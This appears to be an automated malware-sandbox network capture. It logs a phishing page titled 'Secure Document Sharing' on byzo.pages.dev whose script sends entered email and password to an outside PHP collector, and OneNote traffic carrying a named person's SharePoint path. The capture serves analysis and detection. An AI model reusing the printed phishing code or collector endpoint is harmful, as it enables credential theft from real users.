                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://byzo.pages.dev/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2022-10-03 13:38:48 UTC630INHTTP/1.1 200 OK
                                                Date: Mon, 03 Oct 2022 13:38:48 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Content-Length: 13377
                                                Connection: close
                                                Access-Control-Allow-Origin: *
                                                Cache-Control: public, max-age=0, must-revalidate
                                                ETag: "fc1b4709847018b6802b45525a754399"
                                                referrer-policy: strict-origin-when-cross-origin
                                                x-content-type-options: nosniff
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=C0WWFWE%2Bkc0NH7Fr%2BJ1z4Ck7a7xBU5k98u5Y%2Ffb04rjLuHETSnZ7lLEchNqhSTv0%2FpoATQFpr7hYHJUTDCo%2FW8IFn6%2Bj0v4TuA7NDqdlTXfxw%2BcFXWAn0HdHDldjeujvog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 75461489ac769b98-FRA
                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                2022-10-03 13:38:48 UTC630INData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 65 63 75 72 65 20 44 6f 63 75 6d 65 6e 74 20 53 68 61 72 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 09 09 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 53 65 67 6f 65 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 2d 2d 63 6f 6c 6f 72
                                                Data Ascii: <!DOCTYPE html><head> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta charset="utf-8"> <title>Secure Document Sharing</title><style>body {margin: 0;padding: 0;font-family: 'Segoe', sans-serif;--color
                                                2022-10-03 13:38:48 UTC631INData Raw: 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 0a 0a 7d 0a 2e 66 6f 72 6d 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 33 35 30 70 78 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 33 32 30 70 78 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 34 34 70 78 20 34 34 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 35 70 78 20 32 35 70 78 20 72 67
                                                Data Ascii: d-size: cover;background-size: cover;}.form { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); width: 350px; height: 320px; padding: 44px 44px; background: #fff; box-shadow: 0 15px 25px rg
                                                2022-10-03 13:38:48 UTC632INData Raw: 6d 5f 5f 69 6e 70 75 74 2d 2d 65 72 72 6f 72 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 65 72 72 6f 72 29 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 65 72 72 6f 72 29 3b 0a 7d 0a 0a 2e 66 6f 72 6d 5f 5f 69 6e 70 75 74 2d 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 2e 35 72 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 35 72 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 65 72 72 6f 72 29 3b 0a 7d 0a 0a 2e 66 6f 72 6d 5f 5f 62 75 74 74 6f 6e 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 38 72 65 6d 20 32
                                                Data Ascii: m__input--error { color: var(--color-error); border-color: var(--color-error);}.form__input-error-message { margin-top: 0.5rem; font-size: 0.85rem; color: var(--color-error);}.form__button { width: 100%; padding: 0.8rem 2
                                                2022-10-03 13:38:48 UTC634INData Raw: 76 52 46 52 45 4c 33 4e 76 5a 47 6c 77 62 32 52 70 4c 54 41 75 5a 48 52 6b 49 67 6f 67 49 43 42 34 62 57 78 75 63 7a 70 70 62 6d 74 7a 59 32 46 77 5a 54 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 70 62 6d 74 7a 59 32 46 77 5a 53 35 76 63 6d 63 76 62 6d 46 74 5a 58 4e 77 59 57 4e 6c 63 79 39 70 62 6d 74 7a 59 32 46 77 5a 53 49 4b 49 43 41 67 64 32 6c 6b 64 47 67 39 49 6a 45 77 4f 43 49 4b 49 43 41 67 61 47 56 70 5a 32 68 30 50 53 49 79 4e 43 49 4b 49 43 41 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 45 77 4f 43 41 79 4e 43 49 4b 49 43 41 67 64 6d 56 79 63 32 6c 76 62 6a 30 69 4d 53 34 78 49 67 6f 67 49 43 42 70 5a 44 30 69 63 33 5a 6e 4d 54 51 69 43 69 41 67 49 48 4e 76 5a 47 6c 77 62 32 52 70 4f 6d 52 76 59 32 35 68 62 57 55 39 49 6d
                                                Data Ascii: vRFREL3NvZGlwb2RpLTAuZHRkIgogICB4bWxuczppbmtzY2FwZT0iaHR0cDovL3d3dy5pbmtzY2FwZS5vcmcvbmFtZXNwYWNlcy9pbmtzY2FwZSIKICAgd2lkdGg9IjEwOCIKICAgaGVpZ2h0PSIyNCIKICAgdmlld0JveD0iMCAwIDEwOCAyNCIKICAgdmVyc2lvbj0iMS4xIgogICBpZD0ic3ZnMTQiCiAgIHNvZGlwb2RpOmRvY25hbWU9Im
                                                2022-10-03 13:38:48 UTC635INData Raw: 59 32 46 77 5a 54 70 33 61 57 35 6b 62 33 63 74 62 57 46 34 61 57 31 70 65 6d 56 6b 50 53 49 77 49 67 6f 67 49 43 41 67 49 47 6c 75 61 33 4e 6a 59 58 42 6c 4f 6d 4e 31 63 6e 4a 6c 62 6e 51 74 62 47 46 35 5a 58 49 39 49 6e 4e 32 5a 7a 45 30 49 69 41 76 50 67 6f 67 49 44 78 30 61 58 52 73 5a 51 6f 67 49 43 41 67 49 47 6c 6b 50 53 4a 30 61 58 52 73 5a 54 49 69 50 6d 46 7a 63 32 56 30 63 7a 77 76 64 47 6c 30 62 47 55 2b 43 69 41 67 50 48 42 68 64 47 67 4b 49 43 41 67 49 43 42 6b 50 53 4a 4e 4e 44 51 75 4f 44 4d 32 4c 44 51 75 4e 6c 59 78 4f 43 34 30 61 43 30 79 4c 6a 52 57 4e 79 34 31 4f 44 4e 49 4e 44 49 75 4e 45 77 7a 4f 43 34 78 4d 54 6b 73 4d 54 67 75 4e 45 67 7a 4e 69 34 31 4d 7a 46 4d 4d 7a 49 75 4d 54 51 79 4c 44 63 75 4e 54 67 7a 61 43 30 75 4d 44 49
                                                Data Ascii: Y2FwZTp3aW5kb3ctbWF4aW1pemVkPSIwIgogICAgIGlua3NjYXBlOmN1cnJlbnQtbGF5ZXI9InN2ZzE0IiAvPgogIDx0aXRsZQogICAgIGlkPSJ0aXRsZTIiPmFzc2V0czwvdGl0bGU+CiAgPHBhdGgKICAgICBkPSJNNDQuODM2LDQuNlYxOC40aC0yLjRWNy41ODNINDIuNEwzOC4xMTksMTguNEgzNi41MzFMMzIuMTQyLDcuNTgzaC0uMDI
                                                2022-10-03 13:38:48 UTC636INData Raw: 69 77 77 4c 44 41 73 4d 43 30 75 4f 44 55 79 4c 53 34 78 4d 69 77 78 4c 6a 67 77 4f 43 77 78 4c 6a 67 77 4f 43 77 77 4c 44 41 73 4d 43 30 78 4c 6a 51 30 4f 43 34 33 4d 6a 49 73 4d 79 34 30 4e 6a 63 73 4d 79 34 30 4e 6a 63 73 4d 43 77 77 4c 44 41 74 4c 6a 55 35 4d 69 77 79 4c 6a 49 79 4d 31 59 78 4f 43 34 30 53 44 59 77 4c 6a 55 79 4e 56 59 34 4c 6a 55 77 4e 32 67 79 4c 6a 4d 79 4f 58 59 78 4c 6a 55 31 4f 57 67 75 4d 44 4d 34 51 54 49 75 4e 7a 49 35 4c 44 49 75 4e 7a 49 35 4c 44 41 73 4d 43 77 78 4c 44 59 7a 4c 6a 67 31 4e 53 77 34 4c 6a 67 73 4d 69 34 32 4d 54 45 73 4d 69 34 32 4d 54 45 73 4d 43 77 77 4c 44 45 73 4e 6a 55 75 4e 43 77 34 4c 6a 4d 30 4d 32 30 78 4c 44 55 75 4d 6a 55 30 51 54 55 75 4d 7a 55 34 4c 44 55 75 4d 7a 55 34 4c 44 41 73 4d 43 77 78
                                                Data Ascii: iwwLDAsMC0uODUyLS4xMiwxLjgwOCwxLjgwOCwwLDAsMC0xLjQ0OC43MjIsMy40NjcsMy40NjcsMCwwLDAtLjU5MiwyLjIyM1YxOC40SDYwLjUyNVY4LjUwN2gyLjMyOXYxLjU1OWguMDM4QTIuNzI5LDIuNzI5LDAsMCwxLDYzLjg1NSw4LjgsMi42MTEsMi42MTEsMCwwLDEsNjUuNCw4LjM0M20xLDUuMjU0QTUuMzU4LDUuMzU4LDAsMCwx
                                                2022-10-03 13:38:48 UTC638INData Raw: 55 32 4e 43 77 30 4c 6a 55 32 4e 43 77 77 4c 44 41 73 4d 53 30 78 4c 6a 67 79 4f 53 30 78 4c 6a 49 78 4d 79 77 79 4c 6a 59 31 4e 53 77 79 4c 6a 59 31 4e 53 77 77 4c 44 41 73 4d 53 30 75 4e 54 4d 35 4c 54 45 75 4e 7a 45 7a 4c 44 49 75 4e 7a 41 32 4c 44 49 75 4e 7a 41 32 4c 44 41 73 4d 43 77 78 4c 44 45 75 4d 44 59 7a 4c 54 49 75 4d 6b 45 30 4c 6a 49 30 4d 79 77 30 4c 6a 49 30 4d 79 77 77 4c 44 41 73 4d 53 77 34 4d 53 34 31 4c 44 67 75 4d 6a 55 32 59 54 59 75 4e 6a 59 7a 4c 44 59 75 4e 6a 59 7a 4c 44 41 73 4d 43 77 78 4c 44 45 75 4d 54 59 30 4c 6a 45 78 4e 53 77 31 4c 6a 45 32 4d 53 77 31 4c 6a 45 32 4d 53 77 77 4c 44 41 73 4d 53 77 78 4c 6a 41 33 4f 43 34 7a 64 6a 49 75 4d 6a 45 30 59 54 51 75 4f 54 63 30 4c 44 51 75 4f 54 63 30 4c 44 41 73 4d 43 77 77 4c
                                                Data Ascii: U2NCw0LjU2NCwwLDAsMS0xLjgyOS0xLjIxMywyLjY1NSwyLjY1NSwwLDAsMS0uNTM5LTEuNzEzLDIuNzA2LDIuNzA2LDAsMCwxLDEuMDYzLTIuMkE0LjI0Myw0LjI0MywwLDAsMSw4MS41LDguMjU2YTYuNjYzLDYuNjYzLDAsMCwxLDEuMTY0LjExNSw1LjE2MSw1LjE2MSwwLDAsMSwxLjA3OC4zdjIuMjE0YTQuOTc0LDQuOTc0LDAsMCwwL
                                                2022-10-03 13:38:48 UTC639INData Raw: 73 4f 54 6b 75 4e 79 77 33 4c 6a 4d 78 4d 31 59 34 4c 6a 55 77 4e 32 67 7a 4c 6a 51 32 4f 56 59 32 4c 6a 49 34 4d 32 77 79 4c 6a 4d 7a 4f 53 30 75 4e 7a 45 79 56 6a 67 75 4e 54 41 33 61 44 49 75 4d 7a 55 34 64 6a 45 75 4f 54 41 32 61 43 30 79 4c 6a 4d 31 4f 48 59 30 4c 6a 59 79 4f 57 45 78 4c 6a 6b 31 4d 53 77 78 4c 6a 6b 31 4d 53 77 77 4c 44 41 73 4d 43 77 75 4d 7a 4d 79 4c 44 45 75 4d 6a 6b 73 4d 53 34 7a 4d 6a 59 73 4d 53 34 7a 4d 6a 59 73 4d 43 77 77 4c 44 41 73 4d 53 34 77 4e 44 51 75 4d 7a 63 31 4c 44 45 75 4e 54 55 33 4c 44 45 75 4e 54 55 33 4c 44 41 73 4d 43 77 77 4c 43 34 30 4f 44 59 74 4c 6a 45 73 4d 69 34 79 4f 54 51 73 4d 69 34 79 4f 54 51 73 4d 43 77 77 4c 44 41 73 4c 6a 55 74 4c 6a 49 7a 4d 56 59 78 4f 43 34 7a 59 54 49 75 4e 7a 4d 33 4c 44
                                                Data Ascii: sOTkuNyw3LjMxM1Y4LjUwN2gzLjQ2OVY2LjI4M2wyLjMzOS0uNzEyVjguNTA3aDIuMzU4djEuOTA2aC0yLjM1OHY0LjYyOWExLjk1MSwxLjk1MSwwLDAsMCwuMzMyLDEuMjksMS4zMjYsMS4zMjYsMCwwLDAsMS4wNDQuMzc1LDEuNTU3LDEuNTU3LDAsMCwwLC40ODYtLjEsMi4yOTQsMi4yOTQsMCwwLDAsLjUtLjIzMVYxOC4zYTIuNzM3LD
                                                2022-10-03 13:38:48 UTC640INData Raw: 66 6f 72 6d 2d 6d 65 73 73 61 67 65 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 50 6c 65 61 73 65 20 73 69 67 6e 20 69 6e 20 74 6f 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 20 74 6f 20 63 6f 6d 70 6c 65 74 65 20 70 72 6f 63 65 73 73 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 72 6d 5f 5f 69 6e 70 75 74 2d 67 72 6f 75 70 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 65 6d 61 69 6c 20 63 6c 61 73 73 3d 22 66 6f 72 6d 5f 5f 69 6e 70 75 74 22 20 61 75 74 6f 66 6f 63 75 73 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 45 6d 61 69 6c 22 20
                                                Data Ascii: form-messages"> <p>Please sign in to your account to complete process.</p> </div> <div class="form__input-group"> <input type=email class="form__input" autofocus placeholder="Email"
                                                2022-10-03 13:38:48 UTC642INData Raw: 20 20 20 20 20 20 20 20 20 72 65 71 75 65 73 74 2e 6f 6e 6c 6f 61 64 20 3d 20 28 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 74 20 72 65 73 70 6f 6e 73 65 4f 62 6a 65 63 74 20 3d 20 6e 75 6c 6c 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 73 70 6f 6e 73 65 4f 62 6a 65 63 74 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28 72 65 71 75 65 73 74 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 63 61 74 63 68 20 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 27 43 6f 75 6c 64 20 6e 6f 74 20 70 61 72 73 65 20 4a 53 4f
                                                Data Ascii: request.onload = () => { let responseObject = null; try { responseObject = JSON.parse(request.responseText); } catch (e) { console.error('Could not parse JSO
                                                2022-10-03 13:38:48 UTC643INData Raw: 73 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 22 62 6c 6f 63 6b 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 72 65 73 70 6f 6e 73 65 4f 62 6a 65 63 74 2e 6d 65 73 73 61 67 65 73 20 21 3d 20 22 50 61 73 73 77 6f 72 64 20 63 61 6e 6e 6f 74 20 62 65 20 65 6d 70 74 79 21 22 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 72 65 73 70 6f 6e 73 65 4f 62 6a 65 63 74 2e 6d 65 73 73 61 67 65 73 20 21 3d 20 22 45 6d 61 69 6c 20 63 61 6e 6e 6f 74 20 62 65 20 65 6d 70 74 79 21 22 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 72 65 73 70 6f 6e 73 65 4f 62 6a 65 63 74 2e 6d 65 73 73 61 67 65 73 20 21 3d 20 22 54 68 69 73 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 65 6d 61 69 6c 22 29 7b
                                                Data Ascii: s.style.display = "block"; } if(responseObject.messages != "Password cannot be empty!"){ if (responseObject.messages != "Email cannot be empty!"){ if (responseObject.messages != "This is not a valid email"){


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                37192.168.2.34991768.65.120.250443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:39:03 UTC643OUTPOST /huest/test.php HTTP/1.1
                                                Host: kccarpetsandfloorings.com
                                                Connection: keep-alive
                                                Content-Length: 41
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Content-type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Origin: https://byzo.pages.dev
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://byzo.pages.dev/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2022-10-03 13:39:03 UTC644OUTData Raw: 65 6d 61 69 6c 3d 26 70 61 73 73 77 6f 72 64 3d 26 6b 65 79 3d 49 43 48 46 41 32 50 53 33 41 30 55 35 53 4f 57 31 55 59 49
                                                Data Ascii: email=&password=&key=ICHFA2PS3A0U5SOW1UYI
                                                2022-10-03 13:39:03 UTC644INHTTP/1.1 200 OK
                                                keep-alive: timeout=5, max=100
                                                x-powered-by: PHP/7.4.30
                                                access-control-allow-origin: *
                                                set-cookie: PHPSESSID=5bd71c3f7d266d6bd7762c52e6ee8e97; path=/; secure
                                                expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                cache-control: no-store, no-cache, must-revalidate
                                                pragma: no-cache
                                                content-type: text/html; charset=UTF-8
                                                content-length: 50
                                                date: Mon, 03 Oct 2022 13:39:03 GMT
                                                server: LiteSpeed
                                                x-turbo-charged-by: LiteSpeed
                                                connection: close
                                                2022-10-03 13:39:03 UTC645INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 6d 65 73 73 61 67 65 73 22 3a 5b 22 45 6d 61 69 6c 20 63 61 6e 6e 6f 74 20 62 65 20 65 6d 70 74 79 21 22 5d 7d
                                                Data Ascii: {"ok":false,"messages":["Email cannot be empty!"]}


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                38192.168.2.34991813.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:39:04 UTC645OUTPOST /o/RemoteTelemetry.ashx?usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&build=16.0.15707.41015 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 18180
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Content-Type: text/plain;charset=UTF-8
                                                Accept: */*
                                                Origin: https://euc-onenote.officeapps.live.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000; PrivNote=-1; WacUPToggleState=%7B%22CCS%22%3A0%7D; GEU2-ARRAffinity=6d4bbee26ee2cd267faa982251fa1253c2809c10aef235fbcf94243ec19857ca
                                                2022-10-03 13:39:04 UTC646OUTData Raw: 7b 22 64 22 3a 7b 22 61 22 3a 22 4f 6e 65 4e 6f 74 65 22 2c 22 62 22 3a 22 66 72 2d 46 52 22 2c 22 63 22 3a 22 45 64 69 74 22 2c 22 64 22 3a 22 45 44 49 54 22 2c 22 65 22 3a 22 31 36 2e 30 2e 31 35 37 30 37 2e 34 31 30 31 35 22 2c 22 66 22 3a 22 43 68 72 6f 6d 65 22 2c 22 67 22 3a 22 66 72 2d 46 52 22 2c 22 68 22 3a 22 31 30 34 22 2c 22 69 22 3a 22 31 30 34 2e 30 2e 30 22 2c 22 6a 22 3a 22 31 36 2e 30 2e 31 35 37 30 37 2e 34 31 30 31 35 22 2c 22 6b 22 3a 22 47 45 55 32 22 2c 22 6c 22 3a 22 66 72 2d 46 52 22 2c 22 6d 22 3a 22 5c 22 4a 75 56 34 47 6f 53 7a 45 30 33 77 70 77 36 38 55 54 33 37 4e 37 65 4c 2f 38 45 42 6b 49 42 43 63 46 48 59 6b 75 4d 58 50 56 30 3d 5c 22 22 2c 22 6e 22 3a 22 53 68 61 72 65 50 6f 69 6e 74 20 4f 6e 6c 69 6e 65 22 2c 22 6f 22 3a
                                                Data Ascii: {"d":{"a":"OneNote","b":"fr-FR","c":"Edit","d":"EDIT","e":"16.0.15707.41015","f":"Chrome","g":"fr-FR","h":"104","i":"104.0.0","j":"16.0.15707.41015","k":"GEU2","l":"fr-FR","m":"\"JuV4GoSzE03wpw68UT37N7eL/8EBkIBCcFHYkuMXPV0=\"","n":"SharePoint Online","o":
                                                2022-10-03 13:39:04 UTC662OUTData Raw: 69 61 6c 69 7a 65 64 22 3a 22 31 36 36 34 38 33 36 37 30 34 34 36 32 22 2c 22 43 6f 72 65 45 64 69 74 69 6e 67 44 75 72 61 74 69 6f 6e 22 3a 22 32 35 32 30 22 2c 22 4f 72 65 6f 53 6c 69 63 65 31 49 6e 69 74 53 74 61 72 74 22 3a 22 31 36 36 34 38 33 36 37 30 38 33 38 34 22 2c 22 4f 72 65 6f 53 6c 69 63 65 31 49 6e 69 74 22 3a 22 35 30 34 22 2c 22 41 70 70 49 6e 69 74 53 74 61 74 75 73 5f 72 69 62 62 6f 6e 41 75 74 6f 6d 61 74 69 6f 6e 52 65 61 64 79 22 3a 22 31 36 36 34 38 33 36 37 31 32 30 30 39 22 2c 22 41 70 70 49 6e 69 74 53 74 61 74 75 73 5f 63 68 72 6f 6d 65 52 65 61 64 79 22 3a 22 31 36 36 34 38 33 36 37 31 32 30 32 33 22 2c 22 52 69 62 62 6f 6e 49 6e 74 65 72 61 63 74 69 76 65 52 65 61 64 79 22 3a 22 31 31 36 33 32 22 2c 22 41 70 70 49 6e 69 74 53
                                                Data Ascii: ialized":"1664836704462","CoreEditingDuration":"2520","OreoSlice1InitStart":"1664836708384","OreoSlice1Init":"504","AppInitStatus_ribbonAutomationReady":"1664836712009","AppInitStatus_chromeReady":"1664836712023","RibbonInteractiveReady":"11632","AppInitS
                                                2022-10-03 13:39:04 UTC664INHTTP/1.1 200 OK
                                                Cache-Control: private
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: 12169bb5-5fff-449c-a788-cb9e7e213ab5
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM4PEPF0000F2C4
                                                X-OfficeVersion: 16.0.15726.41002
                                                X-OfficeCluster: GEU8
                                                Access-Control-Allow-Origin: https://euc-onenote.officeapps.live.com
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM4PEPF0000F2C4
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_visioslice_control,afd_pptcapacity_2,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: AE1B15BDFDDE4A28B61C79F6C99A0EB8 Ref B: AMS231032608029 Ref C: 2022-10-03T13:39:04Z
                                                Date: Mon, 03 Oct 2022 13:39:03 GMT
                                                Connection: close
                                                Content-Length: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                39192.168.2.34992013.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:39:06 UTC665OUTPOST /o/RemoteUls.ashx?build=16.0.15707.41015&waccluster=GEU2 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 41785
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                X-WacFrontEnd: AM1PEPF000094C7
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703
                                                X-WacUserAgent: MSWACONSync
                                                X-bULS-SuppressionETag: D4C663A7BB170EC4D6D0C2C9132C150D3CBB915A
                                                X-AccessTokenTtl: 1664840296804
                                                X-Requested-With: XMLHttpRequest
                                                X-xhr: 1
                                                sec-ch-ua-platform: "Windows"
                                                haep: 1
